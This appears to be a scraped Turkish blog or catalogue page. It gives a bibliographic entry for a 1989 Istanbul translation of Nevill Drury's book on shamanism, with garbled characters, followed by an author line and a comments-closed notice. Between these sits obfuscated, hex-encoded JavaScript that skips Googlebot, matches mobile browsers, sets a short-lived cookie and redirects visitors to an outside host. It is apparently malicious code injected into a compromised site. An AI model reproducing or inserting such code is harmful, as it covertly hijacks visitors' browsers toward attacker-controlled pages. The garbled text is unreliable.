Nevill Drury, Azamanizm, A�ev: Erkan AzimAYek, Okyanus YayA�nlarA�, A�stanbul,1989

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hakkında M. Taner Çelik

Yoruma kapalı.